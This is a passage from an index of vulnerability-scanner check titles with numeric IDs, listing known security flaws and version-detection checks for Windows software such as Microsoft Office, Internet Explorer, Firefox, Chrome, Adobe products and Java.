(2535512) [900287] Microsoft SMB Client Remote Code Execution Vulnerabilities (2536276) [900285] Microsoft Foundation Class (MFC) Library Remote Code Execution Vulnerability (2500212) [900283] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2506223) [900282] Microsoft DNS Resolution Remote Code Execution Vulnerability (2509553) [900279] Microsoft SMB Client Remote Code Execution Vulnerabilities (2511455) [900278] Microsoft Internet Explorer Multiple Vulnerabilities (2497640) [900273] Microsoft Remote Desktop Client Remote Code Execution Vulnerability (2508062) [900267] Microsoft Media Decompression Remote Code Execution Vulnerability (2447961) [900262] Microsoft Internet Explorer Multiple Vulnerabilities (2416400) [900261] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2293386) [900246] Microsoft Media Decompression Remote Code Execution Vulnerability (979902) [900245] Microsoft Data Analyzer and IE Developer Tools ActiveX Control Vulnerability (980195) [900229] Microsoft Data Analyzer ActiveX Control Vulnerability (978262) [900228] Microsoft Office (MSO) Remote Code Execution Vulnerability (978214) [900223] Microsoft Ancillary Function Driver Elevation of Privilege Vulnerability (956803) [900218] IBM DB2 Server Detection (Windows) [900192] Microsoft Internet Explorer Information Disclosure Vulnerability [900187] Microsoft Internet Explorer Argument Injection Vulnerability [900170] Microsoft iExplorer '&NBSP [900131] Microsoft Internet Explorer Denial of Service Vulnerability [900128] CuteNews Version Detection for Windows [900125] Microsoft SQL Server 2000 sqlvdir.dll ActiveX Buffer Overflow Vulnerability [900123] Apple iTunes Version Detection for Windows [900120] Microsoft Organization Chart Remote Code Execution Vulnerability [900097] Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution [900095] Microsoft ISA Server and Forefront Threat Management Gateway DoS Vulnerability (961759) [900094] Vulnerabilities in Windows Could Allow Elevation of Privilege (959454) [900093] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900092] Windows HTTP Services Could Allow Remote Code Execution Vulnerabilities (960803) [900086] Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690) [900080] Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634) [900079] Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239) [900064] Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175) [900063] Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173) [900061] Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070) [900060] Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807) [900058] Microsoft XML Core Services Remote Code Execution Vulnerability (955218) [900052] Windows Internet Printing Service Allow Remote Code Execution Vulnerability (953155) [900051] Windows Kernel Elevation of Privilege Vulnerability (954211) [900048] Microsoft Excel Remote Code Execution Vulnerability (956416) [900047] Microsoft Office nformation Disclosure Vulnerability (957699) [900046] Microsoft Office Remote Code Execution Vulnerabilities (955047) [900045] Windows Media Player 11 Remote Code Execution Vulnerability (954154) [900044] Windows Media Encoder 9 Remote Code Execution Vulnerability (954156) [900036] Opera Version Detection for Windows [900034] Windows Messenger Could Allow Information Disclosure Vulnerability (955702) [900033] Microsoft PowerPoint Could Allow Remote Code Execution Vulnerabilities (949785) [900029] Microsoft Office Filters Could Allow Remote Code Execution Vulnerabilities (924090) [900028] Microsoft Excel Could Allow Remote Code Execution Vulnerabilities (954066) [900025] Microsoft Office Version Detection [900012] Enumerates List of Windows Hotfixes [900006] Microsoft Word Could Allow Remote Code Execution Vulnerability [900004] Microsoft Access Snapshot Viewer ActiveX Control Vulnerability [900003] Apple Safari Detect Script (Windows) [900002] Apple Safari for Windows Multiple Vulnerabilities July-08 [900001] Opera for Windows Unspecified Code Execution Vulnerabilities July-08 [855466] Solaris Update for OpenWindows 3.6.1 108117-06 [855393] Solaris Update for OpenWindows 3.6.2 111626-04 [855334] Solaris Update for OpenWindows 3.6.2 113792-01 [855246] Solaris Update for OpenWindows 3.7.3 119903-02 [855173] Solaris Update for OpenWindows 3.7.0 112811-02 [855057] Solaris Update for OpenWindows 3.6.2 110286-16 [803479] Adobe Acrobat Multiple Vulnerabilities - Windows [803456] Adobe Air Multiple Vulnerabilities - December12 (Windows) [803454] Adobe Air Multiple Vulnerabilities - November12 (Windows) [803451] Adobe Air Multiple Vulnerabilities - October 12 (Windows) [803354] Mozilla Thunderbird Multiple Vulnerabilities-02 November12 (Windows) [803353] Mozilla SeaMonkey Multiple Vulnerabilities-02 November12 (Windows) [803352] Mozilla Thunderbird ESR Multiple Vulnerabilities-01 November12 (Windows) [803351] Mozilla Thunderbird Multiple Vulnerabilities-01 November12 (Windows) [803350] Mozilla SeaMonkey Multiple Vulnerabilities-01 November12 (Windows) [803349] Mozilla Firefox ESR Multiple Vulnerabilities-01 November12 (Windows) [803347] Mozilla Firefox ESR Code Execution Vulnerabilities - November12 (Windows) [803336] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 03) [803335] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 02) [803334] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 01) [803127] Google Chrome Multiple Vulnerabilities-03 Dec2012 (Windows) [803121] Google Chrome Multiple Vulnerabilities-02 Dec2012 (Windows) [803118] Google Chrome Multiple Vulnerabilities-01 Dec2012 (Windows) [803103] Oracle VM VirtualBox Unspecified Denial of Service Vulnerability (Windows) [803102] Pidgin MXit Message Parsing Buffer Overflow Vulnerability (Windows) [803086] LibreOffice XML Manifest Handling Buffer Overflow Vulnerabilities (Windows) [803084] LibreOffice Graphic Object Loading Buffer Overflow Vulnerability (Windows) [803083] OpenOffice Multiple Buffer Overflow Vulnerabilities - Dec12 (Windows) [803081] Adobe Photoshop Camera Raw Plug-in Code Execution Vulnerabilities (Windows) [803074] Adobe Flash Player Multiple Vulnerabilities - December12 (Windows) [803070] Wireshark Multiple Dissector Multiple Vulnerabilities - Dec12 (Windows) [803068] Wireshark Multiple Dissector Multiple DoS Vulnerabilities - Dec12 (Windows) [803064] LibreOffice Import Files Denial of Service Vulnerabilities (Windows) [803061] Mozilla Firefox Code Execution Vulnerabilities - November12 (Windows) [803059] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803057] Mozilla Firefox Multiple Vulnerabilities-02 November12 (Windows) [803055] Mozilla Firefox Multiple Vulnerabilities-01 November12 (Windows) [803047] Apple QuickTime Multiple Vulnerabilities - Nov12 (Windows) [803044] Adobe Flash Player Multiple Vulnerabilities - November12 (Windows) [803043] RealPlayer Watch Folders Function Buffer Overflow Vulnerability (Windows) [803040] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803038] Google SketchUp '.SKP' File Memory Corruption Vulnerability (Windows) [803028] Microsoft Internet Explorer Remote Code Execution Vulnerability (2757760) [803025] Adobe Photoshop PNG Image Processing Buffer Overflow Vulnerabilities (Windows) [803021] Oracle Java SE JRE AWT Component Unspecified Vulnerability - (Windows) [803020] Oracle Java SE JRE Multiple Remote Code Execution Vulnerabilities - (Windows) [803017] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803015] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803013] Mozilla Products Memory Corruption Vulnerabilities - August12 (Windows) [803011] Mozilla Products Multiple Vulnerabilities - August12 (Windows) [803001] Opera Multiple Vulnerabilities - August12 (Windows) [802996] Mozilla Firefox 'WebSockets' Denial of Service Vulnerability (Windows) [802994] Mozilla Firefox Multiple Vulnerabilities-01 (Windows) [802991] Mozilla Firefox Security Bypass Vulnerabilities - Oct 12 (Windows) [802989] Mozilla Firefox Multiple Vulnerabilities - Oct 12 (Windows) [802986] Adobe Flash Player Multiple Vulnerabilities - October 12 (Windows) [802985] VERITAS Backup Exec Remote Agent Windows Servers BOF Vulnerability [802978] Wireshark LDP PPP and HSRP dissector Multiple Vulnerabilities (Windows) [802975] Google Chrome Windows Kernel Memory Corruption Vulnerability [802972] Google Chrome Multiple Vulnerabilities - Sep12 (Windows-01) [802962] Apple iTunes Multiple Vulnerabilities - Sep 12 (Windows) [802960] Adobe LiveCycle Designer Untrusted Search Path Vulnerability (Windows) [802954] Adobe Reader Multiple Unspecified Vulnerabilities - Windows [802952] Adobe Flash Player Multiple Vulnerabilities -01 August 12 (Windows) [802951] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(02) - (Windows) [802950] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - (Windows) [802949] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(01) - (Windows) [802948] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities - (Windows) [802947] Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows) [802945] Wireshark Multiple Vulnerabilities(01) - August 2012 (Windows) [802944] Wireshark Multiple Vulnerabilities - August 2012 (Windows) [802943] Wireshark GSM RLC MAC dissector Buffer Overflow Vulnerability (Windows) [802940] Adobe Flash Player Font Parsing Code Execution Vulnerability - (Windows) [802938] Adobe Shockwave Player Multiple Vulnerabilities - August 2012 (Windows) [802936] Adobe Reader Multiple Vulnerabilities - Windows [802935] Pidgin 'Libpurple' Cipher API Information Disclosure Vulnerability (Windows) [802932] Google Chrome PDF Viewer Multiple Vulnerabilities (Windows) [802928] Google Chrome Multiple Vulnerabilities - August 12 (Windows) [802925] Apple Safari Multiple Vulnerabilities - Aug 2012 (Windows) [802922] VLC Media Player OGG Demuxer Buffer Overflow Vulnerability (Windows) [802920] VLC Media Player 'MP4' Denial of Service Vulnerability (Windows) [802917] Google Chrome Multiple Vulnerabilities(01) - July 12 (Windows) [802912] Microsoft Unauthorized Digital Certificates Spoofing Vulnerability (2728973) [802907] Wireshark Multiple Denial of Service Vulnerabilities - July 12 (Windows) [802906] Pidgin MSN and XMPP Denial of Service Vulnerabilities (Windows) [802898] Wireshark PPP And NFS Dissector Denial of Service Vulnerabilities (Windows) [802895] Mozilla Products Memory Corruption Vulnerabilities - July12 (Windows) [802893] Mozilla Products Certificate Page Clickjacking Vulnerability (Windows) [802891] Mozilla Firefox Multiple Vulnerabilities - July12 (Windows) [802889] Mozilla Products Multiple Vulnerabilities - July12 (Windows) [802886] Microsoft Sidebar and Gadgets Remote Code Execution Vulnerability (2719662) [802880] Google Chrome Multiple Vulnerabilities - July 12 (Windows) [802871] Adobe Flash Player Multiple Vulnerabilities June-2012 (Windows) [802869] Mozilla Products 'jsinfer.cpp' Denial of Service Vulnerability (Windows) [802865] Mozilla Products Multiple Vulnerabilities - June12 (Windows) [802864] Microsoft XML Core Services Remote Code Execution Vulnerability (2719615) [802848] Google Chrome Multiple Denial of Service Vulnerabilities - May 12 (Windows) [802842] Mozilla Products Security Bypass Vulnerability - May12 (Windows) [802840] Mozilla Products Multiple Vulnerabilities - May12 (Windows) [802835] Google Chrome Multiple Vulnerabilities-02 - April 12 (Windows) [802820] Mozilla Products Multiple Vulnerabilities - Mar12 (Windows) [802811] Adobe Flash Player Multiple Vulnerabilities (Windows) - Mar12 [802807] Google Chrome Multiple Denial of Service Vulnerabilities - March12 (Windows) [802806] Microsoft IIS Default Welcome Page Information Disclosure Vulnerability [802803] Adobe Flash Player Multiple Vulnerabilities (Windows) - Feb12 [802796] Apple Safari Webkit Multiple Vulnerabilities - May 12 (Windows) [802795] Apple QuickTime Multiple Vulnerabilities - (Windows) [802792] Google Chrome Multiple Vulnerabilities - May 12 (Windows) [802790] Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows) [802782] Adobe Photoshop BOF and Use After Free Vulnerabilities (Windows) [802781] Adobe Flash Professional JPG Object Processing BOF Vulnerability (Windows) [802779] Adobe Shockwave Player Multiple Code Execution and DoS Vulnerabilities (Windows) [802774] Microsoft VPN ActiveX Control Remote Code Execution Vulnerability (2695962) [802772] Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows) [802761] Wireshark Multiple Vulnerabilities - April 12 (Windows) [802760] Wireshark IEEE 802.11 Dissector Denial of Service Vulnerability (Windows) [802759] Wireshark Multiple Denial of Service Vulnerabilities - April 12 (Windows) [802748] Adobe Reader Multiple Vulnerabilities April-2012 (Windows) [802732] Google Chrome Multiple Vulnerabilities - April 12 (Windows) [802726] Microsoft SMB Signing Disabled [802722] VLC Media Player Multiple Vulnerabilities - Mar 12 (Windows) [802717] Google Chrome 'History navigation' Arbitrary Code Execution Vulnerability (Windows) [802714] Google Chrome 'GPU process' Multiple Vulnerabilities (Windows) [802713] Pidgin Multiple Denial of Service Vulnerabilities (Windows) [802708] Microsoft Internet Explorer Code Execution and DoS Vulnerabilities [802700] Google Chrome 'HTTP session' Information Disclosure Vulnerability (Windows) [802684] IBM Director CIM Server CIMListener Directory Traversal Vulnerability (Windows) [802681] Oracle Java SE Hash Collision DoS Vulnerability (Windows) [802680] Oracle Java SE 'MurmurHash' Algorithm Hash Collision DoS Vulnerability (Windows) [802677] CA ARCserve Backup RPC Services Multiple Vulnerabilities (Windows) [802670] PHP pdo_sql_parser.re 'PDO' extension DoS vulnerability (Windows) [802652] Opera URL Processing Arbitrary Code Execution Vulnerability (Windows) [802649] Opera Multiple Denial of Service Vulnerabilities - June12 (Windows) [802646] Opera Multiple Vulnerabilities - June12 (Windows) [802612] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 03) [802611] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 02) [802610] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 01) [802600] IBM SPSS SamplePower 'VsVIEW6' ActiveX Control Multiple Code Execution Vulnerabilities (Windows) [802597] Google Chrome Multiple Vulnerabilities - February 12 (Windows 01) [802594] Google Chrome Multiple Vulnerabilities - February 12 (Windows) [802592] Mozilla Products XBL Binding Memory Corruption Vulnerability - (Windows) [802591] PHP 'magic_quotes_gpc' Directive Security Bypass Vulnerability (Windows) [802590] PHP 'php_register_variable_ex()' Remote Code Execution Vulnerability (Windows) [802581] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows 01) [802580] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows) [802579] Mozilla Products IPv6 Literal Syntax Cross Domain Information Disclosure Vulnerability (Windows) [802566] PHP Multiple Denial of Service Vulnerabilities (Windows) [802562] Strawberry Perl Modules Multiple Vulnerabilities (Windows) [802558] Adobe Reader/Acrobat Multiple Memory Corruption Vulnerabilities - Windows [802557] LibreOffice 'DOC' File Denial of Service Vulnerability (Windows) [802547] Mozilla Firefox Cache Objects History Enumeration Weakness Vulnerability (Windows) [802545] Mozilla Products Multiple Information Disclosure Vulnerabilities - (Windows) [802542] Adobe Reader/Acrobat 'U3D' Component Memory Corruption Vulnerability - Windows [802540] Adobe Flash Player 'SWF' File Multiple Code Execution Vulnerability - Windows [802518] Mozilla Products XSS and Memory Corruption Vulnerabilities (Windows) [802517] Mozilla Products Privilege Escalation Vulnerabily (Windows) [802511] Mozilla Products Multiple Vulnerabilities (Windows) [802510] Mozilla Products Browser Engine Denial of Service Vulnerabilities (Windows) [802509] Mozilla Products 'NoWaiverWrapper' Privilege Escalation Vulnerability (Windows) [802508] Adobe Shockwave Player Multiple Vulnerabilities (Windows) - Nov 2011 [802505] FFFTP Untrusted Search Path Vulnerability (Windows) [802504] PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows) [802503] Wireshark CSN.1 Dissector Denial of Service Vulnerability (Windows) [802502] Wireshark Heap Based BOF and Denial of Service Vulnerabilities (Windows) [802499] Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802496] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802490] Google Chrome Multiple Vulnerabilities - Nov2012 (Windows) [802488] VLC Media Player 'libpng_plugin' Denial of Service Vulnerability (Windows) [802485] Adobe Shockwave Player Multiple Vulnerabilities Nov-2012 (Windows) [802482] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-04 oct12 (Windows) [802481] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-03 oct12 (Windows) [802480] VLC Media Player TiVo Demuxer Double Free Vulnerability (Windows) [802479] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-02 oct12 (Windows) [802478] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-01 Oct (Windows) [802473] Google Chrome Multiple Vulnerabilities-02 Oct12 (Windows) [802470] Google Chrome Multiple Vulnerabilities-01 Oct12 (Windows) [802468] Compatibility Issues Affecting Signed Microsoft Binaries (2749655) [802462] Microsoft ActiveSync Null Pointer Dereference Denial Of Service Vulnerability [802451] Google Chrome Multiple Vulnerabilities - Sep12 (Windows) [802450] Opera Address Bar Spoofing Vulnerability (Windows) [802444] XnView Multiple Image Decompression Heap Overflow Vulnerabilities (Windows) [802443] XnView PSD Record Type Parsing Integer Overflow Vulnerabilities (Windows) [802435] Opera 'X.509' Certificates Spoofing Vulnerability (Windows) [802420] VLC Media Player '.amr' File Denial of Service Vulnerability (Windows) [802403] MS Windows Fraudulent Digital Certificates Spoofing Vulnerability (2641690) [802398] Adobe Shockwave Player Multiple Vulnerabilities - Feb 2012 (Windows) [802395] Opera Large Integer Argument Denial of Service Vulnerability (Windows) [802374] Google Chrome Multiple Denial of Service Vulnerabilities - January12 (Windows) [802365] Opera Cache History Information Disclosure Vulnerability (Windows) [802363] Opera Multiple Information Disclosure Vulnerabilities (Windows) [802361] Opera Multiple Vulnerabilities - December11 (Windows) [802358] Google Chrome Cache History Information Disclosure Vulnerabilities (Windows) [802355] Google Chrome Multiple Information Disclosure Vulnerabilities (Windows) [802349] PHP EXIF Header Denial of Service Vulnerability (Windows) [802345] Google Chrome Multiple Vulnerabilities - November11 (Windows) [802343] ChaSen Buffer Overflow Vulnerability (Windows) [802338] Google Chrome Mozilla Network Security Services Privilege Escalation Vulnerability (Windows) [802332] Opera Extended Validation Information Disclosure Vulnerabilities (Windows) [802330] PHP Multiple Vulnerabilities (Windows) - Sep 2011 [802326] Google Chrome multiple vulnerabilities - September11 (Windows) [802316] Google Chrome Multiple Vulnerabilities - August11 (Windows) [802314] Ecava IntegraXor Multiple Cross-Site Scripting Vulnerabilities (Windows) [802313] Google Picasa JPEG Image Processing Remote Code Execution Vulnerability (Windows) [802309] XnView File Search Path Executable File Injection Vulnerability (Windows) [802303] Google Chrome WebGL Texture Information Disclosure Vulnerability (Windows) [802300] Tor Directory Authority 'policy_summarize' Denial of Service Vulnerability (Windows) [802292] IBM Informix Dynamic Server 'oninit.exe' Buffer Overflow Vulnerability (Windows) [802287] Microsoft Internet Explorer Cache Objects History Information Disclosure Vulnerability [802286] Microsoft Internet Explorer Multiple Information Disclosure Vulnerabilities [802284] Apple Safari JavaScript Implementation Information Disclosure Vulnerability (Windows) [802282] Apple Safari WebKit Information Disclosure Vulnerability (Windows) [802278] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802277] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802276] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows04) [802275] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows03) [802274] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows02) [802273] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows01) [802262] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802255] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802249] Wireshark Lua Script File Arbitrary Code Execution Vulnerability (Windows) [802248] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802237] Apple Safari Secure Cookie Security Bypass Vulnerability (Windows) [802227] IBM Lotus Symphony Multiple Vulnerabilities (Windows) [802219] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 04 [802218] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 03 [802217] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 02 [802216] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 01 [802215] Mozilla Firefox Security Bypass Vulnerability July-11 (Windows) [802214] Mozilla Products Multiple Denial of Service Vulnerabilities July-11 (Windows) [802213] Mozilla Products Multiple Vulnerabilities July-11 (Windows) [802212] Mozilla Firefox Multiple Vulnerabilities July-11 (Windows) [802211] Mozilla Products WebGL Information Disclosure Vulnerability July-11 (Windows) [802206] Adobe Products Unspecified Cross-Site Scripting Vulnerability June-2011 (Windows) [802203] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802202] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802201] Wireshark 'bytes_repr_len' Function Denial of Service Vulnerability (Windows) [802200] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802198] Apple QuickTime Multiple Denial of Service Vulnerabilities - (Windows) [802175] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows 01) [802174] Mozilla Products Enter Key Dialog Bypass and Use-After-Free Memory Corruption Vulnerabilities (Windows) [802173] Mozilla Products 'YARR' Code Execution Vulnerability (Windows) [802172] Mozilla Products Same Origin Policy Bypass Vulnerability (Windows) [802171] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities (Windows) [802170] Mozilla Firefox Memory Corruption and Integer Underflow Vulnerabilities (Windows) [802169] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows) [802166] Adobe Reader and Acrobat Multiple Vulnerabilities September-2011 (Windows) [802165] Adobe Reader Unspecified Vulnerability (Windows) [802153] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802152] Mozilla Products Information Disclosure and Security Bypass Vulnerabilities (Windows) [802151] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802150] Mozilla Products Multiple Vulnerabilities (Windows) [802149] Mozilla Firefox Untrusted Search Path Vulnerability (Windows) [802147] Mozilla Products 'SVG' Code Execution Vulnerability (Windows) [802141] Opera 'HTTPS-Session' Multiple Vulnerabilities (Windows) [802138] Mozilla Firefox Multiple Vulnerabilities August-11 (Windows) [802133] Apple QuickTime Multiple Buffer Overflow Vulnerabilities (Windows) [802126] Google Chrome 'GetWidget' methods DoS Vulnerability (Windows) [802119] VLC Media Player 'AMV' Denial of Service Vulnerability (Windows) [802113] Opera Browser 'SRC' Denial of Service Vulnerability (Windows) [802112] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802111] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802110] Adobe Reader and Acrobat Multiple BOF Vulnerabilities June-2011 (Windows) [802107] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802102] Google Chrome Multiple Vulnerabilities - June 11(Windows) [802100] Mozilla Firefox SSL Certificate Spoofing Vulnerability (Windows) [801951] Novell iPrint Client 'printer-url' Multiple BOF Vulnerabilities (Windows) [801935] Microsoft Silverlight Multiple Memory Leak Vulnerabilities [801934] Microsoft Silverlight Version Detection [801921] Adobe Products Arbitrary Code Execution Vulnerability (Windows) [801905] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities March-11 (Windows) [801904] Mozilla Products Buffer Overflow Vulnerability March-11 (Windows) [801903] Mozilla Products Multiple Unspecified Vulnerabilities March-11 (Windows) [801902] Mozilla Products Multiple Vulnerabilities March-11 (Windows) [801898] TigerVNC SSL Certificate Validation Security Bypass Vulnerability (Windows) [801897] TigerVNC Version Detection (Windows) [801890] Google Chrome Multiple Denial of Service Vulnerabilities - May11 (Windows) [801887] Mozilla Products Unspecified Vulnerability May-11 (Windows) [801886] Mozilla Firefox Multiple Unspecified Vulnerabilities May-11 (Windows) [801885] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 02 [801884] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 01 [801883] Mozilla Products Multiple Vulnerabilities May-11 (Windows) [801878] Google Chrome multiple vulnerabilities - May11 (Windows) [801876] Microsoft Internet Explorer 'msxml.dll' Information Disclosure Vulnerability [801875] Mozilla Firefox Information Disclosure Vulnerability (Windows) [801872] Synergy Protocol Information Disclosure Vulnerability (Windows) [801871] Synergy Version Detection (Windows) [801855] Google Chrome multiple vulnerabilities - March 11 (Windows) [801847] Adobe Flash Player Multiple Vulnerabilities February-2011 (Windows) [801844] Adobe Reader and Acrobat Multiple Vulnerabilities February-2011 (Windows) [801831] Microsoft Internet Explorer Incorrect GUI Display Vulnerability [801830] Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability [801825] Google Chrome multiple vulnerabilities - Jan11 (Windows) [801797] Python Multiple Vulnerabilities (Windows) [801795] Python Version Detection (Windows) [801792] Adobe Flash Player Multiple Vulnerabilities May-2011 (Windows) [801790] Perl Denial of Service Vulnerability (Windows) [801789] Google Chrome 'Sandbox' Remote Code Execution Vulnerability (Windows) [801788] Opera Browser 'SELECT' HTML Tag Remote Memory Corruption Vulnerability (Windows) [801786] Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows) [801785] Wireshark X.509if Dissector Denial of service vulnerability (Windows) [801784] VLC Media Player 'MP4_ReadBox_skcr()' Buffer Overflow Vulnerability (Windows) [801782] VLC Media Player 'Bookmark Creation' Buffer Overflow Vulnerability (Windows) [801779] RealNetworks RealPlayer 'OpenURLInDefaultBrowser()' Code Execution Vulnerability (Windows) [801776] Google Chrome 'GPU process' Multiple Code Execution Vulnerabilities (Windows) [801773] Google Chrome 'WebKit' CSS Implementation DoS Vulnerability (Windows) [801772] Rsync Multiple Denial of Service Vulnerabilities (Windows) [801771] Perl Laundering Security Bypass Vulnerability (Windows) [801770] Google Picasa Insecure Library Loading Arbitrary Code Execution Vulnerability (Windows) [801769] Google Picasa Version Detection (Windows) [801768] RealNetworks RealPlayer IVR File Processing Buffer Overflow Vulnerability (Windows) [801763] Google Chrome Multiple Vulnerabilities - March 11(Windows) [801761] Wireshark Denial of Service Vulnerability March-11 (Windows) [801758] Wireshark Denial of Service Vulnerability March-11 (Windows) [801757] Wireshark Multiple Vulnerabilities March-11 (Windows) [801756] Wireshark Denial of Service Vulnerability - March-11 (Windows) [801755] Wireshark Multiple Vulnerabilities - March-11 (Windows) [801749] RealNetworks RealPlayer Buffer Overflow Vulnerability (Windows) [801747] Google Chrome Multiple Denial of Service Vulnerabilities - February 11(Windows) [801742] Wireshark Denial of Service Vulnerability (Windows) [801739] Google Chrome multiple vulnerabilities - February 11(Windows) [801728] Opera Browser Multiple Vulnerabilities Feb-11 (Windows) [801726] VLC Media Player 'CDG decoder' multiple buffer overflow vulnerabilities (Windows) [801725] Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593) [801723] Vulnerability in Windows Services for UNIX Could Allow Elevation of Privilege (939778) [801721] Microsoft Active Directory Denial of Service Vulnerability (953235) [801715] Microsoft XML Core Services Remote Code Execution Vulnerability (936227) [801714] Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782) [801709] Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078) [801708] Vulnerability in Windows Media File Format Could Allow Remote Code Execution [801707] Microsoft Internet Explorer mshtml.dll Remote Memory Corruption Vulnerability (942615) [801704] Microsoft Internet Information Services Privilege Elevation Vulnerability (942831) [801702] Microsoft Internet Explorer HTML Rendering Remote Memory Corruption Vulnerability (944533) [801680] Apple QuickTime Multiple vulnerabilities - Dec10 (Windows) [801678] Google Chrome multiple vulnerabilities - Dec10 (Windows) [801677] Microsoft WMI Administrative Tools ActiveX Control Remote Code Execution Vulnerabilities [801667] Google Chrome multiple vulnerabilities - Dec 10(Windows) [801637] Mozilla Firefox Security Bypass Vulnerability (Windows) [801629] Adobe Flash Player Multiple Vulnerabilities (Windows) [801606] Microsoft Internet Explorer 'mshtml.dll' Information Disclosure Vulnerability [801597] Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability [801596] Microsoft Excel 2007 Office Drawing Layer Remote Code Execution Vulnerability [801595] Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities [801594] Microsoft PowerPoint 2007 OfficeArt Atom Remote Code Execution Vulnerability [801581] MS Windows HID Functionality(Over USB) Code Execution Vulnerability [801561] VMware Products Tools Local Privilege Escalation Vulnerability (Windows) [801540] Google Chrome multiple vulnerabilities - November 10(Windows) [801530] Oracle Java SE Multiple Vulnerabilities (Windows) [801524] Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows) [801520] Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability [801506] RealNetworks RealPlayer Multiple Vulnerabilities (Windows) [801499] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801498] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801497] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801495] Opera Browser Multiple Vulnerabilities December-10 (Windows) [801491] Microsoft 'hxvz.dll' ActiveX Control Memory Corruption Vulnerability (948881) [801489] Microsoft Office Graphics Filters Remote Code Execution Vulnerabilities (968095) [801488] Microsoft Internet Explorer Data Stream Handling Remote Code Execution Vulnerability (947864) [801485] Microsoft Pragmatic General Multicast (PGM) Denial of Service Vulnerability (950762) [801481] Microsoft Wireless LAN AutoConfig Service Remote Code Execution Vulnerability (970710) [801480] Microsoft Web Services on Devices API Remote Code Execution Vulnerability (973565) [801477] Adobe Products Content Code Execution Vulnerability (Windows) [801475] Mozilla Firefox Unspecified Vulnerability Oct-10 (Windows) [801474] Opera Browser Multiple Vulnerabilities October-10 (Windows) [801473] Google Chrome multiple vulnerabilities - October 10(Windows) [801471] Mozilla Products Multiple Cross-site Scripting Vulnerabilities (Windows) [801470] Mozilla Products Multiple Unspecified Vulnerabilities October-10(Windows) [801469] Mozilla Products Unspecified Vulnerability (Windows) [801468] Mozilla Products Multiple Unspecified Vulnerabilities (Windows) [801467] Mozilla Products Multiple Vulnerabilities October-10 (Windows) [801465] Adobe Flash Player Untrusted search path vulnerability (windows) [801460] Google Chrome multiple unspecified vulnerabilities - October 10(Windows) [801452] Mozilla Products 'SJOW' Arbitrary Code Execution Vulnerability (Windows) 